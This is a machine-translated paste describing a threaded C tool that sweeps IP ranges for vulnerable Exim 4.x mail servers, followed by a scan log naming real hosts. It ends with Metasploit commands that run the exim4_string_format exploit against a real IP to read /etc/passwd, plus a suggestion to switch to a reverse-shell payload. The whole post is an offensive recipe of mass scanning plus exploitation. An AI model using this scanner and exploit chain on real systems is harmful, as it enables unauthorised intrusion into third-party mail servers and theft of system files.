Untitled

a guest
Sep 26th, 2017
  1. Exim Remote Scanner nood Server
  2.  
  3. Peace and mercy of God be upon
  4.  
  5.  
  6. A simple tool that can be known for some Exim Remote Scanner nood Server
  7.  
  8.  
  9. Examination of its servers by the network
  10. "Abu so-called hyper or when some Nud"
  11. Of the gap exim stmp
  12.  
  13.  
  14.  
  15. Code:
  16.  
  17.  
  18.  
  19. . / Exim_scan-s 80.237.132.33-e 80.237.255.255-t 20-n 50-p 25-l sec4ever.txt
  20. Exim4 remote Scanner.
  21.  
  22. Set highest priority
  23. Set Max open files to: 1024
  24. Set Logfile: sec4ever.txt
  25. Scan start: 31711 hosts, 50 threads ...
  26.  
  27. -------------------------------------------------- --------------
  28. 80.237.141.10 220 srv05.tj-edv.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:17:22 +0100
  29. 80.237.145.35 220 mail.dalailama-hamburg.de ESMTP exim 4.50 Fri, 24 Dec 2010 12:20:50 +0100
  30. 80.237.153.41 220-server.event-it-store.de ESMTP exim 4.69 # 1 Fri, 24 Dec 2010 12:26:46 +0100
  31. 80.237.154.40 220 portabox.local.com ESMTP exim 4.68 Fri, 24 Dec 2010 11:27:01 +0000
  32. 80.237.154.66 220 mm1.gdata.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:27:09 +0100
  33. 80.237.154.117 220 ds80-237-154-117.dedicated.hosteurope.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:10 +0100
  34. 80.237.155.85 220 qsmirror01.gdatasecurity.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:27 +0100
  35. 80.237.155.86 220 qsmirror02.gdatasecurity.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:27 +0100
  36. 80.237.157.25 220 secksie.org ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:54 +0100
  37. 80.237.157.45 220 server.mfkom.de ESMTP exim 4.69 Fri, 24 Dec 2010 12:27:59 +0100
  38. 80.237.157.97 220 de1.coguan.com ESMTP exim 4.63 Fri, 24 Dec 2010 12:30:17 +0100
  39. 80.237.158.89 220 sester.sidebysite.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:28:18 +0100
  40. 80.237.158.37 220 homer.pl ESMTP exim 4.69 Fri, 24 Dec 2010 12:25:40 +0100
  41. 80.237.158.45 220 mm2.gdata.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:28:19 +0100
  42. 80.237.159.54 220 jugene.betalounge.com ESMTP exim 4.69 Fri, 24 Dec 2010 12:28:39 +0100
  43. 80.237.162.171 220 familie-deden.de ESMTP exim 4.63 Fri, 24 Dec 2010 12:30:49 +0100
  44.  
  45.  
  46. On File
  47.  
  48.  
  49. Code PHP:
  50.  
/*
 * For Linux:
 *   gcc -o exim_scan exim_scan.c -O3 -Wall -pipe -DLinux -lpthread
 * For FreeBSD:
 *   gcc -o exim_scan exim_scan.c -O3 -Wall -pipe -lpthread
 */
#include <assert.h>
#include <errno.h>
#include <limits.h>
#include <signal.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <poll.h>
#include <pthread.h>
#include <regex.h>
#include <sys/resource.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

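#define TIMEOUT 10           /* default per-host timeout, seconds (overridden by -t) */
#define MAXHOSTS 0x7fffffff  /* largest address range accepted (fits an int) */
#define THREADS 256          /* default worker-thread limit (overridden by -n) */

/*
 * POLLRDNORM ("normal data may be read") is an XSI extension that a strict
 * -std=c11 build of glibc's <poll.h> does not expose, which is why the
 * original defined it under -DLinux.  Testing for the macro itself instead
 * of the build flag works on every platform and never overrides a
 * definition the system header did provide.
 */
#ifndef POLLRDNORM
#define POLLRDNORM 0x040
#endif

/* ------------------------------ global state ------------------------------ */

/*
 * errno is provided by <errno.h>; the original's `extern int errno;` is
 * dropped because in a threaded libc errno is a macro over a per-thread
 * location and that declaration is at best redundant, at worst wrong.
 */
static FILE *output = NULL;   /* where matches are written: stdout or the -l logfile */
static char *start = NULL;    /* start host (-s), as given on the command line */
static char *end = NULL;      /* end host (-e) */
static int port = 25;         /* TCP port probed on every host (-p) */
static int totnum = 0;        /* number of IPs to be scanned */
static pthread_t tid;         /* id of the most recently created worker thread */
static int inum = 0;          /* index of the host currently being dispatched */
static time_t t1, t2;         /* scan start / end time */
static int thdnum = THREADS;  /* maximum number of concurrent worker threads (-n) */
static int curnum = 0;        /* current number of live worker threads; guarded by mutex_curnum */
static int timeout = TIMEOUT; /* per-host timeout in seconds (-t) */
static pthread_mutex_t mutex_curnum = PTHREAD_MUTEX_INITIALIZER; /* protects curnum */
static pthread_cond_t cond_curnum = PTHREAD_COND_INITIALIZER;    /* broadcast by a worker when curnum drops */
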
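/*
 * atexit() hook: close the logfile when one was opened.
 *
 * `output` is still NULL if the process exits before main() has set it
 * (a usage error or a rejected address range happens after init_signal()
 * registered this hook), so it must not be passed to fclose() blindly.
 * The original ended with _exit(EXIT_SUCCESS), which skipped the stdio
 * flush libc performs after the atexit handlers and turned every
 * exit(EXIT_FAILURE) into a success status; returning normally lets
 * exit() finish with the status the caller asked for.
 */
static void terminate(void)
{
    if (output != NULL && output != stdout) {
        if (fclose(output) != 0) {
            fprintf(stderr, "terminate: fclose: %s\n", strerror(errno));
        }
        output = stdout;
    }
}
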
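/*
 * Handler for the termination signals installed by init_signal(): print
 * progress statistics and exit (the atexit hook closes the logfile).
 *
 * signo: the signal that was delivered.
 *
 * The elapsed time is computed into a local instead of the global `t2`
 * the original shadowed, and the hosts/sec division is guarded so a
 * signal inside the first second no longer divides by zero.
 * NOTE(review): fprintf(), pthread_*_destroy() and exit() are not
 * async-signal-safe; the original design is kept, but a sig_atomic_t flag
 * polled by main() would be the robust shape.
 */
static void on_terminate(int signo)
{
    time_t now = time(NULL);
    long elapsed = (long)(now - t1);
    long rate = elapsed > 0 ? (inum + 1) / elapsed : inum + 1;

    fprintf(stderr, "----------------------------------------------------------------\n\n");
    fprintf(stderr, "Receive SIG NUM: %d %d/%d hosts, %ld secs, %ld hosts/sec.\n",
            signo, inum + 1, totnum, elapsed, rate);
    pthread_mutex_destroy(&mutex_curnum);
    pthread_cond_destroy(&cond_curnum);
    exit(EXIT_SUCCESS);
} /* end of on_terminate */
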
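/*
 * SIGCHLD handler: reap every exited child without blocking.
 *
 * signo: unused; the handler only serves SIGCHLD.
 *
 * The scanner never forks, so this is defensive.  errno is saved and
 * restored because waitpid() sets it (ECHILD when there is nothing to
 * reap) and the interrupted code may be in the middle of inspecting it.
 */
static void on_sigchld(int signo)
{
    int saved_errno = errno;
    pid_t pid;
    int status;

    (void)signo;
    while ((pid = waitpid(-1, &status, WNOHANG)) > 0) {
        /* NOTE(review): fprintf() is not async-signal-safe; kept as in the original. */
        fprintf(stderr, "child <%u> terminated\n", (unsigned int)pid);
    }
    errno = saved_errno;
} /* end of on_sigchld */
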
/*
 * Install the exit hook and the signal handlers used by the scanner.
 */
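/*
 * Register terminate() as the atexit hook and route the termination
 * signals to on_terminate(), SIGCHLD to on_sigchld().
 *
 * The original looped over the raw signal numbers 1..8, which is the set
 * below on Linux but means something else on other platforms; naming the
 * signals keeps the intent portable.  atexit() and signal() failures are
 * reported instead of ignored: without the hook the logfile would never
 * be closed.
 */
static void init_signal(void)
{
    static const int term_signals[] = {
        SIGHUP, SIGINT, SIGQUIT, SIGILL, SIGTRAP, SIGABRT, SIGBUS, SIGFPE,
        SIGTERM, SIGALRM,
    };
    size_t i;

    if (atexit(terminate) != 0) {
        fprintf(stderr, "init_signal: atexit failed\n");
        exit(EXIT_FAILURE);
    }
    for (i = 0; i < sizeof term_signals / sizeof term_signals[0]; i++) {
        if (signal(term_signals[i], on_terminate) == SIG_ERR) {
            fprintf(stderr, "init_signal: signal(%d): %s\n",
                    term_signals[i], strerror(errno));
        }
    }
    if (signal(SIGCHLD, on_sigchld) == SIG_ERR) {
        fprintf(stderr, "init_signal: signal(SIGCHLD): %s\n", strerror(errno));
    }
} /* end of init_signal */
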
/*
 * New:
 * TCP connect with a non-blocking socket, host given as an IP.
 * Millisecond timeout, so it is fast.  ;D
 * 2003/06/23 added by Sam
 */

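/*
 * Open a TCP connection to the dotted-quad `ip` on `port`, giving up after
 * `timeout` milliseconds.  The connect is issued on a non-blocking socket
 * and waited for with select(); the pending result is then read back via
 * SO_ERROR.
 *
 * Returns the connected socket, restored to blocking mode with
 * SO_KEEPALIVE enabled, or -1 on any failure with errno describing the
 * cause (EINVAL for a malformed address, the connect error for a refused
 * or unreachable host, EMFILE when the descriptor is too high for select()).
 */
static int tcpConnect(const char *ip, unsigned int port, unsigned int timeout)
{
    int sock, flag, pending_err = 0, keepalive = 1;
    socklen_t err_len;
    fd_set rset;
    struct timeval tv;
    struct sockaddr_in addr;

    /* Reject malformed addresses up front.  inet_addr(), which the original
     * used, reports failure as INADDR_NONE, i.e. 255.255.255.255, and the
     * code went on to connect to it. */
    memset(&addr, 0, sizeof addr);
    if (inet_pton(AF_INET, ip, &addr.sin_addr) != 1) {
        errno = EINVAL;
        return -1;
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons((unsigned short)port);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("tcpConnect: socket");
        return -1;
    }

    /* select() cannot track descriptors >= FD_SETSIZE; FD_SET on one of them
     * writes outside the fd_set.  A large -n with a raised rlimit gets here. */
    if (sock >= FD_SETSIZE) {
        close(sock);
        errno = EMFILE;
        return -1;
    }

    flag = fcntl(sock, F_GETFL);
    if (flag == -1) {
        perror("tcpConnect: fcntl");
        close(sock);
        return -1;
    }
    if (fcntl(sock, F_SETFL, flag | O_NONBLOCK) < 0) {
        perror("tcpConnect: fcntl");
        close(sock);
        return -1;
    }

    if (connect(sock, (const struct sockaddr *)&addr, sizeof addr) < 0 &&
        errno != EINPROGRESS) {
        close(sock);
        return -1;
    }

    /* Split the millisecond budget into the seconds/microseconds select()
     * expects.  The original stored the remainder in tv_usec unscaled, so
     * the sub-second part of the timeout was a thousand times too short. */
    tv.tv_sec = timeout / 1000;
    tv.tv_usec = (timeout % 1000) * 1000;

    FD_ZERO(&rset);
    FD_SET(sock, &rset);
    if (select(sock + 1, &rset, &rset, NULL, &tv) <= 0) {
        /* timed out or select() failed: the socket never connected */
        close(sock);
        return -1;
    }

    /* The socket became ready; fetch the real connect() outcome.  The length
     * argument is a socklen_t, not the size_t the original passed. */
    err_len = sizeof pending_err;
    if (getsockopt(sock, SOL_SOCKET, SO_ERROR, &pending_err, &err_len) < 0) {
        perror("tcpConnect: getsockopt");
        close(sock);
        return -1;
    }
    if (pending_err != 0) {
        close(sock);          /* close() first so it cannot clobber the errno we report */
        errno = pending_err;
        return -1;
    }

    /* back to blocking mode for the read that follows */
    if (fcntl(sock, F_SETFL, flag & ~O_NONBLOCK) < 0) {
        perror("tcpConnect: fcntl");
        close(sock);
        return -1;
    }
    if (setsockopt(sock, SOL_SOCKET, SO_KEEPALIVE, &keepalive, sizeof keepalive) < 0) {
        perror("tcpConnect: setsockopt");
        close(sock);
        return -1;
    }

    return sock;
}
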
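/*
 * Scan one host: connect to `port`, read the SMTP greeting, and log the
 * host/banner pair when the banner matches "Exim 4.0x" .. "Exim 4.6x".
 *
 * host: dotted-quad address, NUL-terminated.
 *
 * Only the server's greeting is read; nothing is sent.  A banner can be
 * customised or hidden, so a match is indicative of the version, not
 * proof of it.  Half of the configured `timeout` (seconds) is spent on the
 * connect and the other half waiting for the greeting.  Matches go to
 * `output`, and are echoed to stderr when `output` is a logfile.
 *
 * Fixes against the original: `sock` is initialised so the cleanup path
 * is safe when regcomp() fails (it used to read an uninitialised int and
 * could close() a random descriptor); the response is NUL-terminated
 * before regexec()/"%s" see it (a 512-byte greeting used to overrun the
 * buffer); regfree() is only called on a compiled regex; a poll() wakeup
 * without POLLRDNORM no longer falls through to read().
 */
static void check_exim(const char *host)
{
    int sock = -1;        /* -1 until a connection exists, so cleanup is safe on every path */
    int have_re = 0;      /* set once regcomp() succeeded, so regfree() is only called then */
    int retval, i;
    ssize_t nread;
    char resp[512], errbuf[1024];
    struct pollfd fds[1];
    regex_t re;
    regmatch_t subs[10];
    const char *pattern = "Exim 4\\.[0-6][0-9]";

    retval = regcomp(&re, pattern, REG_EXTENDED);
    if (retval != 0) {
        regerror(retval, &re, errbuf, sizeof errbuf);
        fprintf(stderr, "check_exim: regcomp: %s\n", errbuf);
        goto nonssl_out;
    }
    have_re = 1;

    /* net connect; tcpConnect() takes its budget in milliseconds */
    sock = tcpConnect(host, port, (timeout - timeout / 2) * 1000);
    if (sock < 0) {
        goto nonssl_out;
    }

    fds[0].fd = sock;
    fds[0].events = POLLRDNORM;

    /* wait for the greeting (poll timeout is in milliseconds) */
    retval = poll(fds, 1, (timeout - timeout / 2) * 1000);
    if (retval <= 0 || !(fds[0].revents & POLLRDNORM)) {
        goto nonssl_out;
    }

    /* leave room for the terminator: regexec() and %s need a C string */
    nread = read(sock, resp, sizeof resp - 1);
    if (nread <= 0) {
        goto nonssl_out;
    }
    resp[nread] = '\0';

    /* flatten line breaks so a multi-line greeting prints on one line */
    for (i = 0; i < nread; i++) {
        if (resp[i] == '\r' || resp[i] == '\n') {
            resp[i] = ' ';
        }
    }

    retval = regexec(&re, resp, 10, subs, 0);
    if (retval == REG_NOMATCH) {
        goto nonssl_out;
    }
    if (retval != 0) {
        regerror(retval, &re, errbuf, sizeof errbuf);
        fprintf(stderr, "check_exim: regexec: %s\n", errbuf);
        goto nonssl_out;
    }

    /* matched */
    if (output != stdout) {
        fprintf(stderr, "%-40s %s\n", host, resp); /* also echo to the console */
    }
    fprintf(output, "%-40s %s\n", host, resp);

nonssl_out:
    if (sock >= 0) {
        close(sock);
    }
    if (have_re) {
        regfree(&re);
    }
}
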
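/*
 * Worker thread entry point: scan the host named by `arg`, then release the
 * slot counted in `curnum` and wake the dispatcher.
 *
 * arg: heap-allocated dotted-quad string owned by this thread; freed here.
 * Returns NULL; the thread detaches itself, nobody joins it.
 *
 * All signals are blocked in the worker so the handlers installed by
 * init_signal() only run on the main thread.  pthread_sigmask() is the
 * per-thread call; the original used sigprocmask(), whose behaviour in a
 * multithreaded process is unspecified by POSIX.  (The signal-mask code
 * was originally adapted from scz's code.)
 */
static void *init_scan(void *arg)
{
    pthread_t thread_id = pthread_self();
    sigset_t signal_mask;
    int rc;

    if (sigfillset(&signal_mask) != 0) {
        fprintf(stderr, "sigfillset error in thread [%lu]\n", (unsigned long)thread_id);
        exit(EXIT_FAILURE);
    }
    rc = pthread_sigmask(SIG_BLOCK, &signal_mask, NULL);
    if (rc != 0) {
        fprintf(stderr, "pthread_sigmask error in thread [%lu]: %s\n",
                (unsigned long)thread_id, strerror(rc));
        exit(EXIT_FAILURE);
    }

    pthread_detach(thread_id);
    check_exim(arg);
    free(arg);

    /* hand the slot back and wake main(), which waits in pthread_cond_wait() */
    pthread_mutex_lock(&mutex_curnum);
    curnum--;
    pthread_cond_broadcast(&cond_curnum);
    pthread_mutex_unlock(&mutex_curnum);

    return NULL;
}
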
/*
 * Print usage messages
 */
/*
 * Print the command-line synopsis to stderr.
 *
 * s: the program name (argv[0]), substituted into the first line.
 */
static void usage(char *s)
{
    fprintf(stderr, "Usage: %s", s);
    fputs(" [-s startip] [-e endip] [-t timeout] [-n maxthreadnum]"
          " [-p port:25] [-l logfile] [-h?]\n\n", stderr);
}

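/*
 * Parse the numeric argument of option `-name` and check it lies in [lo, hi].
 *
 * Exits with EXIT_FAILURE on a malformed or out-of-range value.  The
 * original used atoi(), which silently maps garbage to 0: a zero thread
 * count then deadlocks the dispatcher, since no worker slot can ever be
 * acquired, and a zero timeout turns every probe into an immediate failure.
 */
static long parse_long_opt(char name, const char *text, long lo, long hi)
{
    char *endp = NULL;
    long value;

    errno = 0;
    value = strtol(text, &endp, 10);
    if (endp == text || *endp != '\0' || errno == ERANGE || value < lo || value > hi) {
        fprintf(stderr, "invalid value for -%c: '%s' (expected %ld..%ld)\n",
                name, text, lo, hi);
        exit(EXIT_FAILURE);
    }
    return value;
}

/*
 * Entry point.
 *
 * Options: -s startip   first address (required)
 *          -e endip     last address, inclusive (defaults to startip)
 *          -t timeout   per-host timeout in seconds (default TIMEOUT)
 *          -n threads   maximum concurrent workers (default THREADS)
 *          -p port      TCP port (default 25)
 *          -l logfile   result file (default ./exim.ips; matches are also
 *                       echoed to stderr)
 *          -h, -?       usage
 *
 * Walks the range one address at a time and hands each to a detached
 * worker (init_scan) while keeping at most `thdnum` workers alive: the
 * `curnum` counter under `mutex_curnum` enforces the bound and main()
 * blocks on `cond_curnum` until a worker frees a slot.  Each host string
 * is heap-allocated here and freed by the worker that consumes it.
 *
 * Returns EXIT_SUCCESS once every worker has finished, EXIT_FAILURE on a
 * usage error, an invalid address or range, or a failed logfile/thread
 * setup.
 */
int main(int argc, char *argv[])
{
    int opt, rc;
    struct rlimit rl;
    struct in_addr current_ip; /* next address to dispatch */
    struct in_addr final_ip;   /* last address to scan */
    unsigned long long range;  /* inclusive address count, wide enough for a full /0 */
    long fd_budget;            /* descriptors the worker pool may consume */
    long elapsed;
    char *host, *file = "./exim.ips";
    FILE *logfile;

    fprintf(stderr, "Exim4 Remote Scanner.\n\n");

    while ((opt = getopt(argc, argv, "h?s:e:t:n:p:l:")) != -1) {
        switch (opt) {
        case 's':
            start = strdup(optarg);
            if (start == NULL) {
                fprintf(stderr, "No memory left\n");
                return EXIT_FAILURE;
            }
            if (inet_pton(AF_INET, start, &current_ip) != 1) {
                fprintf(stderr, "invalid IP address: %s\n", start);
                return EXIT_FAILURE;
            }
            break;
        case 'e':
            end = strdup(optarg);
            if (end == NULL) {
                fprintf(stderr, "No memory left\n");
                return EXIT_FAILURE;
            }
            if (inet_pton(AF_INET, end, &final_ip) != 1) {
                fprintf(stderr, "invalid IP address: %s\n", end);
                return EXIT_FAILURE;
            }
            break;
        case 't':
            /* check_exim() multiplies by 1000 for milliseconds; keep that from overflowing */
            timeout = (int)parse_long_opt('t', optarg, 1, INT_MAX / 1000);
            break;
        case 'n':
            thdnum = (int)parse_long_opt('n', optarg, 1, INT_MAX - 10);
            break;
        case 'p':
            port = (int)parse_long_opt('p', optarg, 1, 65535);
            break;
        case 'l':
            file = strdup(optarg);
            if (file == NULL) {
                fprintf(stderr, "No memory left\n");
                return EXIT_FAILURE;
            }
            break;
        case 'h':
        case '?':
        default:
            usage(argv[0]);
            exit(EXIT_FAILURE);
        }
    }

    /* -s is required.  The original only rejected the case where both
     * addresses were missing and then read whichever one was never set. */
    if (start == NULL) {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }
    if (end == NULL) {
        final_ip = current_ip; /* single host */
    }
    if (ntohl(final_ip.s_addr) < ntohl(current_ip.s_addr)) {
        fprintf(stderr, "end IP %s is below start IP %s\n", end, start);
        exit(EXIT_FAILURE);
    }

    init_signal();

    /* set highest priority; only root may lower the nice value this far */
    if (geteuid() == 0) {
        if (setpriority(PRIO_PROCESS, 0, -20) == 0) {
            fprintf(stderr, "Set highest priority\n");
        } else {
            fprintf(stderr, "setpriority: %s\n", strerror(errno));
        }
    }

    /* raise the open-file limit to the hard maximum: every live worker holds a socket */
    if (getrlimit(RLIMIT_NOFILE, &rl) == 0) {
        rl.rlim_cur = rl.rlim_max;
        if (setrlimit(RLIMIT_NOFILE, &rl) != 0) {
            fprintf(stderr, "setrlimit: %s\n", strerror(errno));
        }
    }

    /* tcpConnect() waits for the connect with select(), which cannot watch
     * a descriptor numbered FD_SETSIZE or higher, so that is the ceiling
     * even when the rlimit allows more.  Ten descriptors are kept spare for
     * stdio, the logfile and libc.  The original compared against an
     * rlimit struct that was left uninitialised when getrlimit() failed. */
    fd_budget = FD_SETSIZE;
    if (getrlimit(RLIMIT_NOFILE, &rl) == 0) {
        if (rl.rlim_cur == RLIM_INFINITY) {
            fprintf(stderr, "Set Max open files to: unlimited\n");
        } else {
            fprintf(stderr, "Set Max open files to: %ld\n", (long)rl.rlim_cur);
            if (rl.rlim_cur < (rlim_t)fd_budget) {
                fd_budget = (long)rl.rlim_cur;
            }
        }
    }
    if ((long)thdnum + 10 > fd_budget) {
        thdnum = fd_budget > 10 ? (int)(fd_budget - 10) : 1;
        fprintf(stderr, "Too many threads, set threads number to %d\n", thdnum);
    }

    /* computed in 64 bits: a 32-bit subtraction into an int could wrap negative */
    range = (unsigned long long)ntohl(final_ip.s_addr) - ntohl(current_ip.s_addr) + 1;
    if (range > (unsigned long long)MAXHOSTS) {
        fprintf(stderr, "Too many hosts, MAX hosts: %d\n", MAXHOSTS);
        exit(EXIT_FAILURE);
    }
    totnum = (int)range;

    /* Results go to the logfile (-l is never NULL: it starts as ./exim.ips).
     * The stream is only published in `output` once it is known to be open,
     * so the atexit hook never sees a NULL FILE on the failure path. */
    output = stdout;
    if (file != NULL) {
        fprintf(stderr, "Set Logfile: %s\n", file);
        logfile = fopen(file, "w");
        if (logfile == NULL) {
            fprintf(stderr, "Error in open Logfile %s: %s\n", file, strerror(errno));
            return EXIT_FAILURE;
        }
        output = logfile;
    }

    fprintf(stderr, "Scan start: %d hosts, %d threads ...\n\n", totnum, thdnum);
    fprintf(stderr, "----------------------------------------------------------------\n");

    t1 = time(NULL);
    for (inum = 0; inum < totnum; inum++) {
        host = calloc(INET_ADDRSTRLEN, 1);
        if (host == NULL) {
            fprintf(stderr, "No memory left\n");
            return EXIT_FAILURE;
        }
        if (inet_ntop(AF_INET, &current_ip, host, INET_ADDRSTRLEN) == NULL) {
            fprintf(stderr, "inet_ntop: %s\n", strerror(errno));
            free(host);
            return EXIT_FAILURE;
        }
        current_ip.s_addr = htonl(ntohl(current_ip.s_addr) + 1);

        /* block until a worker slot is free; `while`, not `if`, because
         * pthread_cond_wait() may wake spuriously */
        pthread_mutex_lock(&mutex_curnum);
        while (curnum >= thdnum) {
            pthread_cond_wait(&cond_curnum, &mutex_curnum);
        }
        curnum++;
        pthread_mutex_unlock(&mutex_curnum);

        /* init_scan already has the start-routine signature, so no cast;
         * pthread_create() returns the error code rather than setting errno */
        rc = pthread_create(&tid, NULL, init_scan, host);
        if (rc != 0) {
            fprintf(stderr, "pthread_create: %s\n", strerror(rc));
            exit(EXIT_FAILURE);
        }
    }

    /* wait for the last workers to finish */
    pthread_mutex_lock(&mutex_curnum);
    while (curnum > 0) {
        pthread_cond_wait(&cond_curnum, &mutex_curnum);
    }
    pthread_mutex_unlock(&mutex_curnum);

    t2 = time(NULL);
    elapsed = (long)(t2 - t1);

    fprintf(stderr, "----------------------------------------------------------------\n");
    fprintf(stderr, "\nScan completed, %ld sec", elapsed);
    if (elapsed > 0) {
        fprintf(stderr, ", %ld hosts/sec.\n", (long)totnum / elapsed);
    } else {
        fprintf(stderr, "\n");
    }

    pthread_mutex_destroy(&mutex_curnum);
    pthread_cond_destroy(&cond_curnum);
    return EXIT_SUCCESS;
}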
  506. As for the exploitation of a loophole
  507.  
  508.  
  509. Code PHP:
  510.  
  511. use exploit/unix/smtp/exim4_string_format
  512.  
  513. set rhost 80.237.132.33
  514.  
  515. set payload cmd / unix / generic
  516.  
  517. set CMD 'cat / etc / passwd'
  518. And you can change Albailoud to the touch and Reverse Albailoudat many Exim Remote Scanner nood Server
  519.  
  520.  
  521.  
  522. The latter rights reserved for a guest
  523.  
  524. Source